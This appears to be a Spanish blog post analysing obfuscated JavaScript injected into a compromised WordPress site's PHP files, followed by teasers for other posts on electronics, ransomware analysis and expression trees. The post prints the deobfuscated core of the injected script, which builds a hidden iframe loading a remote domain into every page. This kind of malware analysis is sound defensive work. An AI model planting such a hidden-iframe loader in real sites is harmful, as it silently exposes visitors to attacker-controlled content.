Ir al contenido principal

ladenas938 en Wordpress (Script Redirector)

Recientemente han caído en mis manos unos archivos .PHP pertenecientes a un blog basado en "Wordpress". Estos archivos habían sido alterados insertando código malicioso escrito en JavaScript ofuscado para dificultar su interpretación.

Inicialmente el atacante ha infectado todos los archivos de código del blog insertando tanto al comienzo de los mismos como al final, una o varias líneas de código javascript con una longitud de unos 1800 caracteres.

Así que como tenía un rato libre me dije, a ver de qué va este pedacito de código…

El primer paso ha sido tabular el código de forma adecuada para facilitar su lectura, con lo cual han quedado unas 130 líneas de código. A continuación he realizado una primera pasada de limpieza del código eliminando todo el código inservible utilizado para la ofuscación y, finalmente con el "código bueno" entre las manos, cuya longitud era de 13 líneas de código útil se podía ver perfectamente las primeras intenciones.

Han utilizado "codificado de cadenas de texto" para dificultar su lectura, control de excepciones para realizar varios reintentos de carga de una web remota ( www [dot] ladenas938 [dot] com ), la cual era cargada en un IFRAME oculto y creado desde el propio script anexándolo al BODY del blog.

En un fin otro juguete más con el que andan enredando los del lado oscuro ¡qué le vamos a hacer!
En cualquier caso para los que queráis verlo, aquí os dejo el código limpio del script (la parte TRY):

var c = 120;
var u = "body";
var x = String( "appendChild" );
var xE = document;
var f = String("iframe");
var uS = "createElement";
var g = xE[uS](f);
var cA = String("visibility");
g.height = c;
g.width = c;
g.src = String("http://www.ladenas938.com/users/5");
g.style[cA] = "hidden";
xE[u][x](g);

Comentarios

Entradas populares de este blog

Como usar el TL431 (muy facil)

En este artículo, no vamos a entrar en el funcionamiento interno de este IC, ni tampoco en sus características técnicas, puesto que para esos fines ya existe su hoja de datos correspondiente. Más bien, lo que pretendo aquí es dejar constancia de como podemos utilizar este IC desde un punto de vista práctico, útil y sobre todo de una manera sencilla, con el objetivo de que cualquiera pueda utilizarlo. Si has llegado hasta aquí, probablemente ya sabes que por internet hay mucha información sobre este IC, pero también bastante confusa o excesivamente técnica, sin mostrar tan siquiera un ejemplo de funcionamiento, o como calcular sus pasivos. Pues se acabó, a partir de hoy y después de leer este post, ya te quedará claro como utilizar el TL431 para obtener una tensión de referencia estable y precisa. Vamos al grano y que mejor que empezar aclarando que el TL431 NO ES EXACTAMENTE UN ZENER como se empeñan en decir en muchos sitios, es verdad que se le conoce como el Zener Progra

Programadores de Malware ¿Malas prácticas?

Cuando uno se enfrenta al análisis de un nuevo malware, son muchos los frentes que podemos abrir y los enfoques que podemos darle. Como es lógico, un primer paso será identificar que es un malware de aquello que no lo es, y en ocasiones esto es preciso hacerlo con la mayor rapidez posible. Muchas veces no contamos con el tiempo necesario para hacer un análisis completo a priori, y lo único que necesitamos es tomar decisiones tempranas para iniciar todos los protocolos oportunos ante una nueva muestra "maléfica". Parece lógico pensar, que un código que inicialmente está ofuscado, empaquetado, o que hace uso de determinadas APIs del sistema, ya tiene una cierta probabilidad de ser malware y por lo tanto empezar a tratarlo de manera especial. Durante estos días he estado analizando un nuevo malware, posiblemente una variante de tantas que andan circulando en estos días por internet. En concreto, lo que tengo entre manos es un Ransomware, si compañeros, un especimen

Árbol binario de expresión y Notación Posfija (II)

En una publicación anterior, hablaba sobre que es la notación posfija, para que puede ser útil y mostraba un pequeño ejemplo con una expresión aritmética simple: (9 - (5 + 2)) * 3 Pues bien, hoy voy a mostraros como podemos crear el árbol binario correspondiente para analizar o evaluar esta expresión, haciendo uso del recorrido en postorden. Lo primero que debemos hacer es crear el árbol, respetando las siguientes reglas: ⦁ Los nodos con hijos (padres) representarán los operadores de la expresión. ⦁ Las hojas (terminales sin hijos) representarán los operandos. ⦁ Los paréntesis generan sub-árboles. A continuación podemos ver cómo queda el árbol para la expresión del ejemplo (9 - (5 + 2)) * 3: Si queremos obtener la notación postfija a partir de este árbol de expresión, debemos recorrerlo en postorden (nodo izquierdo – nodo derecho – nodo central), obteniendo la expresión: 952+-3x Así, si quisiéramos evaluar la expresión, podemos hacer uso de un algoritmo